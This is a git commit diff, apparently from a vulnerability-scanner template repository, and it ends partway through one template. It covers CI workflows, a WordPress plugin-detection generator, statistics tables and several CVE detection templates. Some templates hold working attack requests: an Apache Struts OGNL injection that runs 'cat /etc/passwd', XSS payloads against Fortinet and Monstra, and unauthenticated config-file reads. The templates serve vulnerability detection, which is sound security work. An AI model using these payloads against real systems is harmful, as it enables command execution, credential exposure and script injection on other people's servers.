patch-1
sandeep 2023-01-23 16:42:30 +05:30
commit b821ccbaf9
954 changed files with 28284 additions and 3200 deletions

30
.github/auto_assign.yml vendored Normal file
View File

@ -0,0 +1,30 @@
# Set to true to add reviewers to pull requests
addReviewers: true
# Set to true to add assignees to pull requests
addAssignees: true
# A list of reviewers to be added to pull requests (GitHub user name)
reviewers:
- ritikchaddha
- DhiyaneshGeek
- pussycat0x
# A number of reviewers added to the pull request
# Set 0 to add all the reviewers (default: 0)
numberOfReviewers: 1
# A list of assignees, overrides reviewers if set
assignees:
- DhiyaneshGeek
- pussycat0x
- ritikchaddha
# A number of assignees to add to the pull request
# Set to 0 to add all of the assignees.
# Uses numberOfReviewers if unset.
numberOfAssignees: 1
# A list of keywords to be skipped the process that add reviewers if pull requests include it
# skipKeywords:
# - wip

View File

@ -0,0 +1,10 @@
beautifulsoup4==4.11.1
bs4==0.0.1
certifi==2022.9.24
charset-normalizer==2.1.1
idna==3.4
Markdown==3.4.1
requests==2.28.1
soupsieve==2.3.2.post1
termcolor==2.1.1
urllib3==1.26.13

View File

@ -0,0 +1,185 @@
#!/usr/bin/env python3
'''
This script reads the URL https://wordpress.org/plugins/browse/popular/ until page 10, extract each plugin name and namespace,
then in http://plugins.svn.wordpress.org/ website, looks for the "Stable tag" inside the readme.txt and extract the last version
number from trunk branch. Finally generates a template and a payload file with last version number to be used during scan that
compares the detect version with the payload version.
The generated template also includes the tags top-100 and top-200 allowing filtering.
e.g.
nuclei -t technologies/wordpress/plugins -tags top-100 -u https://www.example.com
'''
__author__ = "ricardomaia"
from time import sleep
from bs4 import BeautifulSoup
import requests
import re
from markdown import markdown
import os
from termcolor import colored, cprint
# Regex to extract the name of th plugin from the URL
regex = r"https://wordpress.org/plugins/(\w.+)/"
ranking = 1
# Top 200 Wordpress Plugins
for page_number in range(1, 11):
html = requests.get(url=f"https://wordpress.org/plugins/browse/popular/page/{page_number}", headers={
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
"Accept-Language": "en-US,en;q=0.9",
"Accept-Encoding": "gzip, deflate",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Connection": "keep-alive",
"Upgrade-Insecure-Requests": "1",
"Cache-Control": "max-age=0",
"Pragma": "no-cache",
}).content
# Parse HTML
soup = BeautifulSoup(html, 'html.parser')
results = soup.find(id="main")
articles = results.find_all("article", class_="plugin-card")
# Setting the top tag
top_tag = "top-100,top-200" if page_number <= 5 else "top-200"
# Get each plugin in the page
for article in articles:
full_title = article.find("h3", class_="entry-title").get_text()
regex_remove_quotes = r"[\"`:]"
subst_remove_quotes = "'"
title = re.sub(regex_remove_quotes, subst_remove_quotes, full_title)
link = article.find("a").get("href")
name = re.search(regex, link).group(1)
cprint(f"Title: {title}", "cyan")
cprint(f"Link: {link}", "yellow")
cprint(f"Name: {name} - Ranking: {ranking}", "green")
print(f"Page Number: {page_number}")
print(f"Top Tag: {top_tag}")
print(f"http://plugins.svn.wordpress.org/{name}/trunk/readme.txt")
ranking += 1
sleep(0.2)
# Get the readme.txt file from SVN
readme = requests.get(
url=f"http://plugins.svn.wordpress.org/{name}/trunk/readme.txt",
headers={
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7,es;q=0.6",
"Cache-Control": "no-cache",
"Connection": "keep-alive",
"Host": "plugins.svn.wordpress.org",
"Pragma": "no-cache",
"Upgrade-Insecure-Requests": "1",
"Referer": "http://plugins.svn.wordpress.org/{name}/trunk/"}).content
# Extract the plugin version
try:
version = re.search(r"(?i)Stable.tag:\s+([\w.]+)",
readme.decode("utf-8")).group(1)
except:
version = "N/A"
# Extract the plugin description
try:
description_markdown = re.search(
r"(?i)==.Description.==\W+\n?(.*)", readme.decode("utf-8")).group(1)
html = markdown(description_markdown)
full_description = BeautifulSoup(html, 'html.parser').get_text()
regex_max_length = r"(\b.{80}\b)"
subst_max_lenght = "\\g<1>\\n "
description = re.sub(
regex_max_length, subst_max_lenght, full_description, 0, re.MULTILINE)
except:
description = "N/A"
print(f"Version: {version}")
print(f"Description: {description}")
# Write the plugin template to file
template = f'''id: wordpress-{name}
info:
name: {title} Detection
author: ricardomaia
severity: info
reference:
- https://wordpress.org/plugins/{name}/
metadata:
plugin_namespace: {name}
wpscan: https://wpscan.com/plugin/{name}
tags: tech,wordpress,wp-plugin,{top_tag}
requests:
- method: GET
path:
- "{{{{BaseURL}}}}/wp-content/plugins/{name}/readme.txt"
payloads:
last_version: helpers/wordpress/plugins/{name}.txt
extractors:
- type: regex
part: body
internal: true
name: internal_detected_version
group: 1
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
- type: regex
part: body
name: detected_version
group: 1
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
matchers-condition: or
matchers:
- type: dsl
name: "outdated_version"
dsl:
- compare_versions(internal_detected_version, concat("< ", last_version))
- type: regex
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
'''
work_dir = os.getcwd()
print(f"Current working directory: {work_dir}")
helper_dir = f"{work_dir}/helpers/wordpress/plugins"
template_dir = f"{work_dir}/technologies/wordpress/plugins"
if not os.path.exists(helper_dir):
os.makedirs(helper_dir)
if not os.path.exists(template_dir):
os.makedirs(template_dir)
helper_path = f"helpers/wordpress/plugins/{name}.txt"
version_file = open(helper_path, "w")
version_file.write(version)
version_file.close()
template_path = f"technologies/wordpress/plugins/{name}.yaml"
template_file = open(template_path, "w") # Dev environment
template_file.write(template)
template_file.close()
print("--------------------------------------------")
print("\n")

92
.github/scripts/yaml2json.go vendored Normal file
View File

@ -0,0 +1,92 @@
package main
import (
"encoding/json"
"fmt"
"io/ioutil"
"os"
"path/filepath"
"strings"
"gopkg.in/yaml.v3"
)
type Classification struct {
CVSSScore string `yaml:"cvss-score,omitempty"`
}
type Info struct {
Name string `yaml:"name"`
Severity string `yaml:"severity"`
Description string `yaml:"description"`
Classification Classification `yaml:"classification,omitempty"`
}
type Data struct {
ID string `yaml:"id"`
Info Info `yaml:"info"`
FilePath string `json:"file_path"`
}
func main() {
if len(os.Args) != 3 {
fmt.Println("Usage: go run main.go <directory> <output_file>")
os.Exit(1)
}
directory := os.Args[1]
outputFile := os.Args[2]
var data []Data
err := filepath.Walk(directory, func(path string, info os.FileInfo, err error) error {
if strings.HasSuffix(path, ".yaml") || strings.HasSuffix(path, ".yml") {
yamlFile, err := ioutil.ReadFile(path)
if err != nil {
fmt.Printf("Error reading YAML file %s: %v\n", path, err)
return err
}
var d Data
err = yaml.Unmarshal(yamlFile, &d)
if err != nil {
fmt.Printf("Error unmarshalling YAML file %s: %v\n", path, err)
return err
}
if d.Info.Classification.CVSSScore == "" {
d.Info.Classification.CVSSScore = "N/A"
}
if d.Info.Classification == (Classification{}) {
d.Info.Classification.CVSSScore = "N/A"
}
d.FilePath = path
data = append(data, d)
}
return nil
})
if err != nil {
fmt.Printf("Error reading directory: %v\n", err)
os.Exit(1)
}
var jsonData []byte
for _, d := range data {
temp, err := json.Marshal(d)
if err != nil {
fmt.Printf("Error marshalling JSON: %v\n", err)
os.Exit(1)
}
jsonData = append(jsonData, temp...)
jsonData = append(jsonData, byte('\n'))
}
err = ioutil.WriteFile(outputFile, jsonData, 0644)
if err != nil {
fmt.Printf("Error writing JSON data to file: %v\n", err)
os.Exit(1)
}
fmt.Println("JSON data written to", outputFile)
}

View File

@ -3,28 +3,26 @@ name: ✍🏻 CVE Annotate
on:
push:
branches:
- master
- main
paths:
- 'cves/**.yaml'
workflow_dispatch:
jobs:
docs:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
- uses: actions/checkout@v3
with:
fetch-depth: 0
- name: Get Github tag
id: meta
run: |
curl --silent "https://api.github.com/repos/projectdiscovery/nuclei/releases/latest" | jq -r .tag_name | xargs -I {} echo TAG={} >> $GITHUB_OUTPUT
- name: Set up Go
uses: actions/setup-go@v3
with:
go-version: 1.19
- name: Setup CVE annotate
if: steps.meta.outputs.TAG != ''
env:
VERSION: ${{ steps.meta.outputs.TAG }}
run: |
wget -q https://github.com/projectdiscovery/nuclei/releases/download/${VERSION}/cve-annotate.zip
sudo unzip cve-annotate.zip -d /usr/local/bin
working-directory: /tmp
- name: cve-annotate install
run: go install -v github.com/projectdiscovery/nuclei/v2/cmd/cve-annotate@latest
- name: Generate CVE Annotations
id: cve-annotate

38
.github/workflows/cve2json.yml vendored Normal file
View File

@ -0,0 +1,38 @@
name: Generate JSON Metadata of CVE Templates
on:
push:
tags:
- '*'
workflow_dispatch:
jobs:
build:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@master
- name: Set up Go
uses: actions/setup-go@v3
with:
go-version: 1.19
check-latest: true
- name: run yaml2json.go to generate cves.json
run: |
go env -w GO111MODULE=off
go get gopkg.in/yaml.v3
go run .github/scripts/yaml2json.go /home/runner/work/nuclei-templates/nuclei-templates/cves/ cves.json
- name: Commit files
run: |
git pull
git add cves.json
git config --local user.email "action@github.com"
git config --local user.name "GitHub Action"
git commit -m "Auto Generated cves.json [$(date)] :robot:" -a
- name: Push changes
uses: ad-m/github-push-action@master
with:
github_token: ${{ secrets.GITHUB_TOKEN }}
branch: master

View File

@ -3,7 +3,9 @@ name: 🥳 New Template List
on:
push:
branches:
- master
- main
paths:
- '**.yaml'
workflow_dispatch:
jobs:

View File

@ -1,6 +1,10 @@
name: ❄️ YAML Lint
on: [push, pull_request]
on:
pull_request:
paths:
- '**.yaml'
workflow_dispatch:
jobs:
build:

41
.github/workflows/template-checksum.yml vendored Normal file
View File

@ -0,0 +1,41 @@
name: 📝 Template Checksum
on:
push:
tags:
- '*'
workflow_dispatch:
jobs:
build:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@master
- name: Set up Go
uses: actions/setup-go@v3
with:
go-version: 1.19
check-latest: true
cache: true
- name: install checksum generator
run: |
go install -v github.com/projectdiscovery/nuclei/v2/cmd/generate-checksum@dev
- name: generate checksum
run: |
generate-checksum /home/runner/work/nuclei-templates/nuclei-templates/ templates-checksum.txt
- name: Commit files
run: |
git pull
git add templates-checksum.txt
git config --local user.email "action@github.com"
git config --local user.name "GitHub Action"
git commit -m "Auto Generated Templates Checksum [$(date)] :robot:" -a
- name: Push changes
uses: ad-m/github-push-action@master
with:
github_token: ${{ secrets.GITHUB_TOKEN }}
branch: master

View File

@ -3,18 +3,23 @@ name: 📑 Template-DB Indexer
on:
push:
branches:
- master
- main
paths:
- '**.yaml'
workflow_dispatch:
jobs:
index:
runs-on: ubuntu-latest
steps:
- uses: actions/setup-go@v2
- name: Set up Go
uses: actions/setup-go@v3
with:
go-version: 1.17
go-version: 1.19
check-latest: true
cache: true
- name: Intalling Indexer
- name: Installing Indexer
run: |
git config --global url."https://${{ secrets.ACCESS_TOKEN }}@github".insteadOf https://github
git clone https://github.com/projectdiscovery/nucleish-api.git

View File

@ -1,26 +1,26 @@
name: 🛠 Template Validate
on: [ push, pull_request ]
on:
pull_request:
paths:
- '**.yaml'
workflow_dispatch:
jobs:
build:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
- uses: actions/checkout@v3
with:
fetch-depth: 0
- name: Get Github tag
id: meta
run: |
curl --silent "https://api.github.com/repos/projectdiscovery/nuclei/releases/latest" | jq -r .tag_name | xargs -I {} echo TAG={} >> $GITHUB_OUTPUT
- name: Set up Go
uses: actions/setup-go@v3
with:
go-version: 1.19
- name: Setup Nuclei
if: steps.meta.outputs.TAG != ''
env:
VERSION: ${{ steps.meta.outputs.TAG }}
run: |
wget -q https://github.com/projectdiscovery/nuclei/releases/download/${VERSION}/nuclei_${VERSION:1}_linux_amd64.zip
sudo unzip nuclei*.zip -d /usr/local/bin
working-directory: /tmp
- name: nuclei install
run: go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest
- name: Template Validation
run: |

View File

@ -10,10 +10,14 @@ jobs:
build:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@master
- uses: actions/setup-go@v2
- uses: actions/checkout@v3
with:
go-version: 1.18
fetch-depth: 0
- name: Set up Go
uses: actions/setup-go@v3
with:
go-version: 1.19
- name: Installing Template Stats
run: |
@ -52,4 +56,3 @@ jobs:
uses: ad-m/github-push-action@master
with:
github_token: ${{ secrets.GITHUB_TOKEN }}
branch: master

View File

@ -0,0 +1,45 @@
name: ✨ WordPress Plugins - Update
on:
schedule:
- cron: "0 4 * * *" # every day at 4am UTC
workflow_dispatch:
jobs:
Update:
runs-on: ubuntu-latest
steps:
- name: Check out repository code
uses: actions/checkout@v3
with:
persist-credentials: false # otherwise, the token used is the GITHUB_TOKEN, instead of your personal token
fetch-depth: 0 # otherwise, you will failed to push refs to dest repo
- name: Install Python3
uses: actions/setup-python@v4
with:
python-version: "3.10"
- run: |
python -m pip install --upgrade pip
pip install -r .github/scripts/wordpress-plugins-update-requirements.txt
- name: Update Templates
id: update-templates
run: |
python3 .github/scripts/wordpress-plugins-update.py
git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT
- name: Commit files
if: steps.update-templates.outputs.CHANGES > 0
run: |
git config --local user.email "action@github.com"
git config --local user.name "GitHub Action"
git add --all
git commit -m "Auto WordPress Plugins Update [$(date)] :robot:"
- name: Push changes
if: steps.update-templates.outputs.CHANGES > 0
uses: ad-m/github-push-action@master
with:
github_token: ${{ secrets.GITHUB_TOKEN }}
branch: ${{ github.ref }}

View File

@ -0,0 +1,11 @@
cves/2022/CVE-2022-1168.yaml
cves/2022/CVE-2022-39195.yaml
exposed-panels/connect-box-login.yaml
exposed-panels/esphome-panel.yaml
exposed-panels/sqlbuddy-panel.yaml
misconfiguration/esphome-dashboard.yaml
vulnerabilities/other/academy-lms-xss.yaml
vulnerabilities/other/slims-xss.yaml
vulnerabilities/other/sound4-file-disclosure.yaml
vulnerabilities/other/tikiwiki-xss.yaml
"\342\200\216\342\200\216misconfiguration/sound4-directory-listing.yaml"

View File

@ -41,19 +41,19 @@ An overview of the nuclei template project, including statistics on unique tags,
## Nuclei Templates Top 10 statistics
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1551 | dhiyaneshdk | 701 | cves | 1528 | info | 1666 | http | 4323 |
| panel | 778 | daffainfo | 662 | exposed-panels | 780 | high | 1152 | file | 78 |
| edb | 582 | pikpikcu | 344 | vulnerabilities | 519 | medium | 835 | network | 77 |
| exposure | 551 | pdteam | 274 | misconfiguration | 361 | critical | 552 | dns | 17 |
| xss | 541 | geeknik | 206 | technologies | 319 | low | 281 | | |
| lfi | 519 | dwisiswant0 | 171 | exposures | 308 | unknown | 25 | | |
| wordpress | 470 | pussycat0x | 171 | token-spray | 236 | | | | |
| cve2021 | 369 | 0x_akoko | 170 | workflows | 190 | | | | |
| wp-plugin | 365 | ritikchaddha | 163 | default-logins | 116 | | | | |
| tech | 357 | princechaddha | 153 | file | 78 | | | | |
|-----------|-------|--------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1575 | dhiyaneshdk | 708 | cves | 1552 | info | 1919 | http | 4631 |
| panel | 803 | daffainfo | 662 | exposed-panels | 805 | high | 1170 | network | 84 |
| wordpress | 684 | pikpikcu | 344 | technologies | 529 | medium | 849 | file | 78 |
| edb | 583 | pdteam | 273 | vulnerabilities | 528 | critical | 568 | dns | 17 |
| wp-plugin | 579 | geeknik | 220 | misconfiguration | 372 | low | 294 | | |
| exposure | 573 | ricardomaia | 210 | exposures | 325 | unknown | 26 | | |
| tech | 567 | pussycat0x | 181 | token-spray | 237 | | | | |
| xss | 549 | dwisiswant0 | 171 | workflows | 190 | | | | |
| lfi | 522 | 0x_akoko | 171 | default-logins | 122 | | | | |
| cve2021 | 375 | ritikchaddha | 167 | file | 78 | | | | |
**321 directories, 4733 files**.
**337 directories, 5307 files**.
</td>
</tr>

File diff suppressed because one or more lines are too long

File diff suppressed because it is too large Load Diff

View File

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1551 | dhiyaneshdk | 701 | cves | 1528 | info | 1666 | http | 4323 |
| panel | 778 | daffainfo | 662 | exposed-panels | 780 | high | 1152 | file | 78 |
| edb | 582 | pikpikcu | 344 | vulnerabilities | 519 | medium | 835 | network | 77 |
| exposure | 551 | pdteam | 274 | misconfiguration | 361 | critical | 552 | dns | 17 |
| xss | 541 | geeknik | 206 | technologies | 319 | low | 281 | | |
| lfi | 519 | dwisiswant0 | 171 | exposures | 308 | unknown | 25 | | |
| wordpress | 470 | pussycat0x | 171 | token-spray | 236 | | | | |
| cve2021 | 369 | 0x_akoko | 170 | workflows | 190 | | | | |
| wp-plugin | 365 | ritikchaddha | 163 | default-logins | 116 | | | | |
| tech | 357 | princechaddha | 153 | file | 78 | | | | |
|-----------|-------|--------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1575 | dhiyaneshdk | 708 | cves | 1552 | info | 1919 | http | 4631 |
| panel | 803 | daffainfo | 662 | exposed-panels | 805 | high | 1170 | network | 84 |
| wordpress | 684 | pikpikcu | 344 | technologies | 529 | medium | 849 | file | 78 |
| edb | 583 | pdteam | 273 | vulnerabilities | 528 | critical | 568 | dns | 17 |
| wp-plugin | 579 | geeknik | 220 | misconfiguration | 372 | low | 294 | | |
| exposure | 573 | ricardomaia | 210 | exposures | 325 | unknown | 26 | | |
| tech | 567 | pussycat0x | 181 | token-spray | 237 | | | | |
| xss | 549 | dwisiswant0 | 171 | workflows | 190 | | | | |
| lfi | 522 | 0x_akoko | 171 | default-logins | 122 | | | | |
| cve2021 | 375 | ritikchaddha | 167 | file | 78 | | | | |

1552
cves.json Normal file

File diff suppressed because it is too large Load Diff

View File

@ -1,18 +1,21 @@
id: CVE-2008-6465
info:
name: Parallels H-Sphere - Cross Site Scripting
name: Parallels H-Sphere 3.0.0 P9/3.1 P1 - Cross-Site Scripting
author: edoardottt
severity: medium
description: |
Multiple cross-site scripting (XSS) vulnerabilities in login.php in webshell4 in Parallels H-Sphere 3.0.0 P9 and 3.1 P1 allow remote attackers to inject arbitrary web script or HTML via the (1) err, (2) errorcode, and (3) login parameters.
Parallels H-Sphere 3.0.0 P9 and 3.1 P1 contains multiple cross-site scripting vulnerabilities in login.php in webshell4. An attacker can inject arbitrary web script or HTML via the err, errorcode, and login parameters, thus allowing theft of cookie-based authentication credentials and launch of other attacks.
reference:
- http://www.xssing.com/index.php?x=3&y=65
- https://exchange.xforce.ibmcloud.com/vulnerabilities/45254
- https://exchange.xforce.ibmcloud.com/vulnerabilities/45252
- https://nvd.nist.gov/vuln/detail/CVE-2008-6465
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2008-6465
cwe-id: CWE-80
metadata:
verified: true
shodan-query: title:"Parallels H-Sphere
@ -40,3 +43,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/12/08

View File

@ -0,0 +1,37 @@
id: CVE-2010-1429
info:
name: JBossEAP - Sensitive Information Disclosure
author: R12W4N
severity: low
description: |
Red Hat JBoss Enterprise Application Platform (aka JBoss EAP or JBEAP) 4.2 before 4.2.0.CP09 and 4.3 before 4.3.0.CP08 allows remote attackers to obtain sensitive information about "deployed web contexts" via a request to the status servlet, as demonstrated by a full=true query string. NOTE: this issue exists because of a CVE-2008-3273 regression.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2010-1429
- https://nvd.nist.gov/vuln/detail/CVE-2008-3273
- https://rhn.redhat.com/errata/RHSA-2010-0377.html
- http://securitytracker.com/id?1023918
classification:
cve-id: CVE-2010-1429
metadata:
shodan-query: title:"JBoss"
verified: "true"
tags: cve,cve2010,jboss,eap,tomcat,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/status?full=true"
matchers-condition: and
matchers:
- type: word
words:
- "JVM"
- "memory"
- "localhost/"
condition: and
- type: status
status:
- 200

View File

@ -1,10 +1,10 @@
id: CVE-2016-6601
info:
name: ZOHO WebNMS Framework 5.2 and 5.2 SP1 - Directory Traversal
name: ZOHO WebNMS Framework <5.2 SP1 - Local File Inclusion
author: 0x_Akoko
severity: high
description: Directory traversal vulnerability in the file download functionality in ZOHO WebNMS Framework 5.2 and 5.2 SP1 allows remote attackers to read arbitrary files via a .. (dot dot) in the fileName parameter to servlets/FetchFile
description: ZOHO WebNMS Framework before version 5.2 SP1 is vulnerable local file inclusion which allows an attacker to read arbitrary files via a .. (dot dot) in the fileName parameter to servlets/FetchFile.
reference:
- https://github.com/pedrib/PoC/blob/master/advisories/webnms-5.2-sp1-pwn.txt
- https://www.exploit-db.com/exploits/40229/
@ -30,3 +30,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2023/01/15

View File

@ -0,0 +1,45 @@
id: CVE-2017-11165
info:
name: DataTaker DT80 dEX 1.50.012 - Sensitive Configurations Exposure
author: theabhinavgaur
severity: critical
description: |
dataTaker DT80 dEX 1.50.012 allows remote attackers to obtain sensitive credential and configuration information via a direct request for the /services/getFile.cmd?userfile=config.xml URI.
reference:
- https://www.exploit-db.com/exploits/45094
- https://nvd.nist.gov/vuln/detail/CVE-2017-11165
- https://packetstormsecurity.com/files/143328/DataTaker-DT80-dEX-1.50.012-Sensitive-Configuration-Exposure.html
- https://www.exploit-db.com/exploits/42313/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2017-11165
cwe-id: CWE-200
metadata:
shodan-query: http.title:"datataker"
verified: "true"
tags: lfr,edb,cve,cve2017,datataker,config,packetstorm,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/services/getFile.cmd?userfile=config.xml"
matchers-condition: and
matchers:
- type: word
words:
- "COMMAND_SERVER"
- "<loggerSettings>"
- "config id=\"config"
condition: and
- type: word
part: header
words:
- "text/xml"
- type: status
status:
- 200

View File

@ -0,0 +1,44 @@
id: CVE-2017-14186
info:
name: FortiGate FortiOS SSL VPN Web Portal - Cross-Site Scripting
author: johnk3r
severity: medium
description: |
FortiGate FortiOS through SSL VPN Web Portal contains a cross-site scripting vulnerability. The login redir parameter is not santized, so an attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks such as a URL redirect. Affected versions are 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, and 5.4 and below.
reference:
- https://www.fortiguard.com/psirt/FG-IR-17-242
- https://fortiguard.com/advisory/FG-IR-17-242
- https://web.archive.org/web/20210801135714/http://www.securitytracker.com/id/1039891
- https://nvd.nist.gov/vuln/detail/CVE-2017-14186
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2017-14186
cwe-id: CWE-79
metadata:
shodan-query: port:10443 http.favicon.hash:945408572
verified: "true"
tags: cve,cve2017,fortigate,xss,fortinet
requests:
- method: GET
path:
- "{{BaseURL}}/remote/loginredir?redir=javascript:alert(document.domain)"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'location=decodeURIComponent("javascript%3Aalert%28document.domain%29"'
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# Enhanced by md on 2023/01/11

View File

@ -1,38 +0,0 @@
id: CVE-2017-14186
info:
name: FortiGate SSL VPN Web Portal - Cross Site Scripting
author: johnk3r
severity: medium
description: |
Failure to sanitize the login redir parameter in the SSL-VPN web portal may allow an attacker to perform a Cross-site Scripting (XSS) or an URL Redirection attack.
reference:
- https://www.fortiguard.com/psirt/FG-IR-17-242
- https://nvd.nist.gov/vuln/detail/CVE-2017-14186
classification:
cve-id: CVE-2017-14186
metadata:
verified: true
shodan-query: port:10443 http.favicon.hash:945408572
tags: cve,cve2017,fortigate,xss,fortinet
requests:
- method: GET
path:
- "{{BaseURL}}/remote/loginredir?redir=javascript:alert(document.domain)"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'location=decodeURIComponent("javascript%3Aalert%28document.domain%29"'
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

View File

@ -4,32 +4,36 @@ info:
name: Apache Struts 2 - Remote Command Execution
author: Random_Robbie
severity: critical
description: Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 is vulnerable to remote command injection attacks through incorrectly parsing an attacker's invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.
description: |
Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 is vulnerable to remote command injection attacks through incorrectly parsing an attacker's invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.
reference:
- https://github.com/mazen160/struts-pwn
- https://nvd.nist.gov/vuln/detail/CVE-2017-5638
- https://isc.sans.edu/diary/22169
- https://github.com/rapid7/metasploit-framework/issues/8064
- https://nvd.nist.gov/vuln/detail/CVE-2017-5638
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2017-5638
cwe-id: CWE-20
tags: apache,kev,msf,cve,cve2017,struts,rce
metadata:
shodan-query: html:"Apache Struts"
verified: "true"
tags: cve,cve2017,apache,kev,msf,struts,rce
requests:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1
Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Hacker','Bounty Plz')}.multipart/form-data
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
Content-Type: %{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#cmd="cat /etc/passwd",#cmds={"/bin/bash","-c",#cmd},#p=new java.lang.ProcessBuilder(#cmds),#p.redirectErrorStream(true),#process=#p.start(),#b=#process.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#rw=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#rw.println(#e),#rw.flush())}
matchers-condition: and
matchers:
- type: word
words:
- "X-Hacker: Bounty Plz"
part: header
- type: regex
regex:
- "root:.*:0:0:"
# Enhanced by mp on 2022/04/26
- type: status
status:
- 200

View File

@ -18,7 +18,7 @@ info:
- http://www.openwall.com/lists/oss-security/2017/04/16/2
- https://nvd.nist.gov/vuln/detail/CVE-2017-7615
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2017-7615
cwe-id: CWE-640

View File

@ -9,7 +9,7 @@ info:
reference:
- https://developer.joomla.org/security-centre/692-20170501-core-sql-injection.html
- https://nvd.nist.gov/vuln/detail/CVE-2017-8917
- http://www.securitytracker.com/id/1038522
- https://web.archive.org/web/20211207050608/http://www.securitytracker.com/id/1038522
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8

View File

@ -0,0 +1,49 @@
id: CVE-2018-11227
info:
name: Monstra CMS V3.0.4 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
Monstra CMS 3.0.4 and earlier has XSS via index.php.
reference:
- https://github.com/monstra-cms/monstra/issues/438
- https://nvd.nist.gov/vuln/detail/CVE-2018-11227
- https://www.exploit-db.com/exploits/44646
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-11227
cwe-id: CWE-79
metadata:
shodan-query: http.favicon.hash:419828698
verified: "true"
tags: cve,cve2018,xss,mostra,mostracms,cms,edb
requests:
- raw:
- |
POST /admin/index.php?id=pages HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
login="><svg/onload=alert(document.domain)>&password=xxxxxx&login_submit=Log+In
matchers-condition: and
matchers:
- type: word
part: body
words:
- "><svg/onload=alert(document.domain)>"
- "Monstra"
condition: and
case-insensitive: true
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

View File

@ -0,0 +1,63 @@
id: CVE-2018-11473
info:
name: Monstra CMS V3.0.4 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
Monstra CMS 3.0.4 has XSS in the registration Form (i.e., the login parameter to users/registration).
reference:
- https://github.com/monstra-cms/monstra/issues/446
- https://nvd.nist.gov/vuln/detail/CVE-2018-11473
- https://github.com/nikhil1232/Monstra-CMS-3.0.4-XSS-ON-Registration-Page
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-11473
cwe-id: CWE-79
metadata:
